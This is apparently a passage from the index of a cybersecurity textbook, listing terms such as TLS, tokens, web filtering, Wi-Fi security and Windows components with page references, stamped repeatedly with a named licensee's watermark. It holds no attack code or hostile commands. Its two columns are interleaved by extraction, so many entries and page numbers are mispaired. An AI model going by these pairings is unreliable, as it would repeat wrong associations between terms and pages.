ticket granting ticket (TGT), recognizing, 493–494 tuples, 264, 363
G-28, 91–92, 136, 394 security awareness training, I2P, 237
ticketing, 434 491–492 Twitter, 93
time stamp, 92, 93 Transmission Control Protocol 2FA. see two-factor
time-based one-time password (TCP), 102, 305 authentication (2FA)
(TOTP), 76 transparent data encryption two-factor authentication
time-based restrictions, 86 (TDE), 62 (2FA), 74
timeline, G-28, 343 transparent firewall, 119 Type I error, 74
time-of-check to time-of-use transparent modes, 119 Type II error, 74
(TOCTOU), G-28, 220 transparent proxy servers, type-safe programming
time-of-day restrictions, G-28, G-28, 122–123 languages, G-29, 221
86 Transport Layer Security (TLS), typosquatting, G-29, 33
TKIP. see Temporal Key G-28, 63, 125, 130, 305–307
Integrity Protocol (TKIP) cipher suites, 306–307 U
TLS. see Transport Layer handshake, 306, 307
UAC. see User Account Control
Security (TLS) implementing, 305–306
(UAC)
TLS VPN. see Transport Layer protocol security, 305
UAV. see unmanned aerial
Security virtual private network SSL/TLS versions, 306
vehicle (UAV)
(TLS VPN) tunneling, 130–132
UBA. see user behavior
TOCTOU (time-of-check to Transport Layer Security virtual
analytics (UBA)
time-of-use), 220 private network (TLS VPN),
UDP. see User Datagram
token-based key card lock, 201 130–132
Protocol (UDP)
tokenization, G-28, 66, 483 transport mode, 132
UEBA. see user and entity
tokens transport protocols, 102
behavior analytics (UEBA)
generation of, 76 transport/communication
UEFI. see Unified Extensible
hard authentication, 76–77 encryption, G-28, 63–64
Firmware Interface (UEFI)
soft authentication, 77 transposition algorithms, 39
ultrasonic sensors, 205
tombstone, 485 Trello, 185
unauthorized access (black
top secret (critical) data, 472 trend analysis, G-28, 268
hat), 19
TOR (The Onion Router), 147, Triple DES (3DES), 215
unauthorized servers, 309
237 Tripwire, 281
unclassified (public) data, 472
total cost of ownership (TCO), TRNG. see true random
underblocking, 270
174 number generator (TRNG)
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
web filtering, G-30, 269–270 Wi-Fi Direct, 297 Windows File Protection
agent-based filtering, 269 Wi-Fi Protected Access (WPA), service, 280
benefits of, 269 G-30, 63, 65, 256 Windows Intune, 293
block rules, 270 Wi-Fi Protected Access 3 for locking down Android
centralized, 269–270 (WPA3), 257, 258 connectivity methods,
content categorization, 270 Wi-Fi Protected Setup (WPS), 296
issues related to, 270 G-30, 256–257 restricting device
reputation-based filtering, Wi-Fi tethering, 297 permissions using, 295
270 WikiLeaks, 20 Windows Management
URL scanning, 269–270 wildcard domain, G-30, 52–53 Instrumentation (WMI), 373,
web media, 27 Windows 374, 397
web metadata, 355 authentication, 89 Windows Server benchmarks,
WebAuthn, 78 discretionary access 252
Webex, 185 control, 81 Windows Server range, 148
WebSocket, 134 Elevation of Privilege Windows Update, 279
WEP. see Wired Equivalent vulnerability, 220 Wired Equivalent Privacy (WEP),
Privacy (WEP) end-of-life status, 212 G-30, 256
whaling, 33 Group Policy, 285, 288 wired network vectors, 25
white box testing, 239 Group Policy Objects in wireless access point (WAP),
white hat (authorized access), Windows Server 2016, 85 102, 254
19 Local Security Authority wireless attacks, 391–392
wide area networks (WANs), Subsystem Service (LSASS), key recovery, 392
101 394–395 rogue access points,
Widget, 91 local sign-in, 89 391–392
Wi-Fi logs, 350 wireless denial of service
authentication, 258–259 network sign-in, 89 attack, 392
advanced NT LAN Manager (NTLM), wireless replay, 392
authentication, 258–259 394, 395 wireless denial of service (DoS)
Remote Authentication registry, 342 attack, 392
Dial-In User Service, 259 remote sign-in, 89 wireless encryption, 256–257
WPA2 pre-shared key Security Account Manager Wi-Fi Protected Access 3,
authentication, 258 (SAM), 394–395 257
WPA3 person sign-in screen, 71 Wi-Fi Protected Setup,
authentication, 258 SYSTEM, 377, 395, 400 256–257
deperimeterization and, System File Checker tool, wireless networks. see Wi-Fi
164 280 wireless replay, 392
easy connect, 257 system memory acquisition, wireless vectors, 26
hotspots, 86 342 Wireshark, 307, 354, 389
installation considerations, User Account Control, 83, WMI. see Windows
254–255 87 Management Instrumentation
heat maps, 255 vulnerabilities, 210, 211, (WMI)
site surveys, 254–255 244 WO. see Work Order (WO)
wireless access point Windows Active Directory (AD), Work Order (WO), 457
placement, 254 89, 91, 93, 94, 396 work recovery time (WRT),
network, 74 Windows Active Directory G-30, 450
tethering, 297 network, 85, 394 workforce capacity, changes in,
ad hoc Wi-Fi, 297 Windows BitLocker, 277, 278 185
personal area networks, Windows Defender, 351 workforce multiplier, G-30,
297 Windows Desktop benchmarks, 435
tethering and hotspots, 252 working (operation),
297 Windows Event Viewer, 349, 412
Wi-Fi Direct, 297 351 workstation security, 416
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Index
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024